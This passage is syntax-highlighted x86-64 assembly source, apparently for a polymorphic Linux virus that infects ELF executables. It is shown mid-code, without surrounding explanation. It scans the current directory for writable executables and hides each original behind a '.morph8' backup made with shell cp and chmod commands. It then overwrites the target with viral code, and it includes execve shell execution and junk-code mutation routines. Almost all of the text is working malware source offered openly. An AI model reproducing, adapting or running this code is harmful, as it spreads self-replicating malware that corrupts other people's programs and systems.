class="p">]</span> <span class="nf">sub</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">POP</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">bl</span> <span class="nf">jne</span> <span class="nv">.invalid</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">1</span> <span class="c1">; Valid sequence</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.invalid:</span> <span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span> <span class="nl">.done:</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">ret</span> <span class="c1">; insert new junk sequence</span> <span class="nl">insert:</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r9</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">call</span> <span class="nb">sp</span><span class="nv">awn_junk</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">ret</span> <span class="c1">;; shell command execution</span> <span class="nl">exec_sh:</span> <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mh">0x40</span> <span class="nf">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">],</span> <span class="nv">sh_arg0_ptr</span> <span class="nf">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="o">+</span><span class="mi">8</span><span class="p">],</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="o">+</span><span class="mi">16</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">shell_path</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_execve</span> <span class="nf">syscall</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">call</span> <span class="nv">sys_exit</span> <span class="nl">sh_arg0_ptr:</span> <span class="kd">dq</span> <span class="nv">sh_arg0</span> <span class="nl">sh_arg1_ptr:</span> <span class="kd">dq</span> <span class="nv">sh_arg1</span> <span class="nl">list:</span> <span class="c1">; scan directory for infection targets</span> <span class="nf">push</span> <span class="nb">rbp</span> <span class="nf">mov</span> <span class="nb">rbp</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r13</span> <span class="nf">push</span> <span class="nv">r14</span> <span class="nf">push</span> <span class="nv">r15</span> <span class="nf">mov</span> <span class="nv">r14</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">current_dir</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">O_RDONLY</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">call</span> <span class="nv">sys_open</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">jl</span> <span class="nv">.list_error</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rax</span> <span class="nl">.list_loop:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">di</span><span class="nv">r_buf</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">4096</span> <span class="nf">call</span> <span class="nv">sys_getdents64</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">je</span> <span class="nv">.list_done</span> <span class="nf">mov</span> <span class="nv">r13</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">xor</span> <span class="nv">r15</span><span class="p">,</span> <span class="nv">r15</span> <span class="nl">.list_entry:</span> <span class="nf">cmp</span> <span class="nv">r15</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">jge</span> <span class="nv">.list_loop</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">di</span><span class="nv">r_buf</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r15</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">add</span> <span class="nv">r8</span><span class="p">,</span> <span class="mi">16</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="kt">word</span> <span class="p">[</span><span class="nv">r8</span><span class="p">]</span> <span class="c1">; d_reclen at offset 16</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">19</span> <span class="nf">jl</span> <span class="nv">.skip_entry</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">4096</span> <span class="nf">jg</span> <span class="nv">.skip_entry</span> <span class="nf">push</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">add</span> <span class="nv">r8</span><span class="p">,</span> <span class="mi">18</span> <span class="nf">mov</span> <span class="nb">cl</span><span class="p">,</span> <span class="p">[</span><span class="nv">r8</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">cl</span><span class="p">,</span> <span class="mi">8</span> <span class="nf">jne</span> <span class="nv">.skip_entry</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">19</span> <span class="nf">cmp</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">],</span> <span class="s">'.'</span> <span class="nf">jne</span> <span class="nv">.check_file</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">cmp</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">je</span> <span class="nv">.skip_entry</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">cmp</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="s">'.'</span> <span class="nf">je</span> <span class="nv">.skip_entry</span> <span class="nl">.check_file:</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r14</span> <span class="nf">call</span> <span class="nv">basename</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span> <span class="nf">call</span> <span class="nv">strcmp</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.chosen_one</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">push</span> <span class="nb">rsi</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="c1">; Check if filename starts with .morph8</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">hidden_prefix</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nl">.see_hidden:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nb">rbx</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">dl</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">jz</span> <span class="nv">.is_hidden</span> <span class="c1">; End of prefix - it's a hidden file</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">jne</span> <span class="nv">.not_hidden</span> <span class="c1">; Mismatch - not hidden</span> <span class="nf">inc</span> <span class="nb">rbx</span> <span class="nf">inc</span> <span class="nb">rsi</span> <span class="nf">jmp</span> <span class="nv">.see_hidden</span> <span class="nl">.is_hidden:</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">jmp</span> <span class="nv">.skip_entry</span> <span class="nl">.not_hidden:</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">vxx_str</span> <span class="nf">call</span> <span class="nv">strstr</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jnz</span> <span class="nv">.found_vxx</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">X_OK</span> <span class="nf">call</span> <span class="nv">sys_access</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">jne</span> <span class="nv">.not_exec</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">W_OK</span> <span class="nf">call</span> <span class="nv">sys_access</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">jne</span> <span class="nv">.not_exec</span> <span class="nf">jmp</span> <span class="nv">.e_conditions</span> <span class="nl">.not_exec:</span> <span class="nf">jmp</span> <span class="nv">.skip_entry</span> <span class="nl">.e_conditions:</span> <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">256</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r8</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span> <span class="nf">call</span> <span class="nv">hidden_name</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_open</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r8</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">O_RDONLY</span> <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">syscall</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">js</span> <span class="nv">.not_exists</span> <span class="c1">; Hidden file exists - been here, skip it</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">call</span> <span class="nv">sys_close</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">256</span> <span class="nf">jmp</span> <span class="nv">.skip_entry</span> <span class="nl">.not_exists:</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">256</span> <span class="c1">; Check if we're trying to infect ourselves</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="c1">; Save current filename</span> <span class="c1">; Get our own basename</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">bin_name</span> <span class="nf">call</span> <span class="nv">basename</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span> <span class="nf">call</span> <span class="nv">strcmp</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_self_infection</span> <span class="c1">; If filenames match, skip infection</span> <span class="c1">; Check if file is a valid ELF executable before infection</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">call</span> <span class="nv">is_elf</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_non_elf</span> <span class="c1">; Not a valid ELF, skip infection</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">call</span> <span class="nv">implant</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">jmp</span> <span class="nv">.skip_entry</span> <span class="nl">.skip_self_infection:</span> <span class="c1">; Don't infect ourselves, just skip</span> <span class="nf">jmp</span> <span class="nv">.skip_entry</span> <span class="nl">.skip_non_elf:</span> <span class="c1">; Not a valid ELF executable, skip infection</span> <span class="nf">jmp</span> <span class="nv">.skip_entry</span> <span class="nl">.chosen_one:</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">orig_exec_name</span> <span class="nf">call</span> <span class="nv">strcpy</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">jmp</span> <span class="nv">.skip_entry</span> <span class="nl">.found_vxx:</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">vierge</span><span class="p">],</span> <span class="mi">0</span> <span class="nl">.skip_entry:</span> <span class="nf">pop</span> <span class="nb">rax</span> <span class="nf">add</span> <span class="nv">r15</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jmp</span> <span class="nv">.list_entry</span> <span class="nl">.list_done:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">call</span> <span class="nv">sys_close</span> <span class="nl">.list_error:</span> <span class="nf">pop</span> <span class="nv">r15</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">pop</span> <span class="nb">rbp</span> <span class="nf">ret</span> <span class="nl">implant:</span> <span class="c1">; infect target executable</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r13</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rdi</span> <span class="c1">; Validate input</span> <span class="nf">test</span> <span class="nv">r12</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">jz</span> <span class="nv">.d_skip</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">call</span> <span class="nv">strlen</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nv">r13</span><span class="p">,</span> <span class="nb">rax</span> <span class="c1">; Check filename length bounds</span> <span class="nf">cmp</span> <span class="nv">r13</span><span class="p">,</span> <span class="mi">200</span> <span class="nf">jg</span> <span class="nv">.d_skip</span> <span class="nf">test</span> <span class="nv">r13</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">jz</span> <span class="nv">.d_skip</span> <span class="c1">; Check if we have code to embed</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.d_skip</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">65536</span> <span class="nf">jg</span> <span class="nv">.d_skip</span> <span class="c1">; 1: Create hidden backup of original file</span> <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">768</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">512</span> <span class="c1">; Use third section for hidden name</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">call</span> <span class="nv">hidden_name</span> <span class="c1">; Check if hidden backup already exists</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_open</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">512</span> <span class="c1">; hidden name</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">O_RDONLY</span> <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">syscall</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">js</span> <span class="nv">.fallback</span> <span class="c1">; File doesn't exist, create backup</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">call</span> <span class="nv">sys_close</span> <span class="nf">jmp</span> <span class="nv">.infect_orgi</span> <span class="c1">; Proceed to reinfect with new mutations</span> <span class="nl">.fallback:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="c1">; Use first section for command</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">cp_cmd_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">r12</span> <span class="c1">; original filename</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">512</span> <span class="c1">; hidden name</span> <span class="nf">call</span> <span class="nb">sp</span><span class="nv">rintf_two_args</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">call</span> <span class="nv">system_call</span> <span class="c1">; Set permissions on hidden file</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">256</span> <span class="c1">; Use second section for chmod command</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">ch</span><span class="nv">mod_cmd_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">512</span> <span class="c1">; hidden name</span> <span class="nf">call</span> <span class="nb">sp</span><span class="nv">rintf</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">256</span> <span class="nf">call</span> <span class="nv">system_call</span> <span class="nl">.infect_orgi:</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">768</span> <span class="c1">; 2: Replace original file with viral code</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="c1">; original filename</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">code</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">]</span> <span class="nf">call</span> <span class="nv">write_f</span> <span class="nl">.d_skip:</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">ret</span> <span class="c1">;; payload execution</span> <span class="nl">execute:</span> <span class="c1">; virus payload</span> <span class="nf">JUNK</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">msg_cat</span> <span class="nf">call</span> <span class="nv">strlen</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">msg_cat</span> <span class="nf">call</span> <span class="nv">sys_write</span> <span class="nf">JUNK</span> <span class="nf">ret</span> <span class="nl">hidden_name:</span> <span class="c1">; create .morph8</span> <span class="nf">push</span> <span class="nb">rsi</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nv">hidden_prefix</span> <span class="nl">.check_prefix:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nb">rbx</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="p">[</span><span class="nb">rcx</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">dl</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">jz</span> <span class="nv">.already_one</span> <span class="c1">; it matches</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">jne</span> <span class="nv">.add_prefix</span> <span class="c1">; Mismatch</span> <span class="nf">inc</span> <span class="nb">rbx</span> <span class="nf">inc</span> <span class="nb">rcx</span> <span class="nf">jmp</span> <span class="nv">.check_prefix</span> <span class="nl">.already_one:</span> <span class="c1">; File already has .morph8 prefix, just copy it</span> <span class="nf">jmp</span> <span class="nv">.cp_file</span> <span class="nl">.add_prefix:</span> <span class="c1">; Add .morph8 prefix</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">],</span> <span class="s">'.'</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span> <span class="o">+</span> <span class="mi">1</span><span class="p">],</span> <span class="s">'m'</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span> <span class="o">+</span> <span class="mi">2</span><span class="p">],</span> <span class="s">'o'</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span> <span class="o">+</span> <span class="mi">3</span><span class="p">],</span> <span class="s">'r'</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span> <span class="o">+</span> <span class="mi">4</span><span class="p">],</span> <span class="s">'p'</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span> <span class="o">+</span> <span class="mi">5</span><span class="p">],</span> <span class="s">'h'</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span> <span class="o">+</span> <span class="mi">6</span><span class="p">],</span> <span class="s">'8'</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">7</span> <span class="nl">.cp_file:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">jz</span> <span class="nv">.done</span> <span class="nf">mov</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">inc</span> <span class="nb">rsi</span> <span class="nf">inc</span> <span class="nb">rdi</span> <span class="nf">jmp</span> <span class="nv">.cp_file</span> <span class="nl">.done:</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">ret</span> <span class="nl">sprintf:</span> <span class="c1">; basic string formatting</span> <span class="nf">push</span> <span class="nv">r9</span> <span class="nf">push</span> <span class="nv">r10</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rdi</span> <span class="c1">; dst</span> <span class="nf">mov</span> <span class="nv">r9</span><span class="p">,</span> <span class="nb">rsi</span> <span class="c1">; string</span> <span class="nf">mov</span> <span class="nv">r10</span><span class="p">,</span> <span class="nb">rdx</span> <span class="c1">; arg</span> <span class="nl">.scan_format:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r9</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">jz</span> <span class="nv">.done</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="s">'%'</span> <span class="nf">je</span> <span class="nv">.found_percent</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.scan_format</span> <span class="nl">.found_percent:</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r9</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="s">'s'</span> <span class="nf">je</span> <span class="nv">.cp_arg</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="s">'%'</span> <span class="nf">je</span> <span class="nv">.cp_percent</span> <span class="c1">; Unknown format, copy literally</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="s">'%'</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.scan_format</span> <span class="nl">.cp_percent:</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="s">'%'</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.scan_format</span> <span class="nl">.cp_arg:</span> <span class="nf">push</span> <span class="nv">r9</span> <span class="nf">mov</span> <span class="nv">r9</span><span class="p">,</span> <span class="nv">r10</span> <span class="nl">.cp_loop:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r9</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">jz</span> <span class="nv">.cp_done</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.cp_loop</span> <span class="nl">.cp_done:</span> <span class="nf">pop</span> <span class="nv">r9</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.scan_format</span> <span class="nl">.done:</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">pop</span> <span class="nv">r10</span> <span class="nf">pop</span> <span class="nv">r9</span> <span class="nf">ret</span> <span class="nl">sprintf_two_args:</span> <span class="c1">; string with two args</span> <span class="nf">push</span> <span class="nb">rbp</span> <span class="nf">mov</span> <span class="nb">rbp</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">push</span> <span class="nv">r10</span> <span class="nf">push</span> <span class="nv">r11</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rdi</span> <span class="c1">; dst buffer</span> <span class="nf">mov</span> <span class="nv">r9</span><span class="p">,</span> <span class="nb">rsi</span> <span class="c1">; string</span> <span class="nf">mov</span> <span class="nv">r10</span><span class="p">,</span> <span class="nb">rdx</span> <span class="c1">; 1 arg</span> <span class="nf">mov</span> <span class="nv">r11</span><span class="p">,</span> <span class="nb">rcx</span> <span class="c1">; 2 arg</span> <span class="nf">xor</span> <span class="nv">r12</span><span class="p">,</span> <span class="nv">r12</span> <span class="c1">; arg cnt</span> <span class="nl">.cp_loop:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r9</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">je</span> <span class="nv">.done</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="s">'%'</span> <span class="nf">je</span> <span class="nv">.handle_format</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">inc</span> <span class="nv">r8</span> 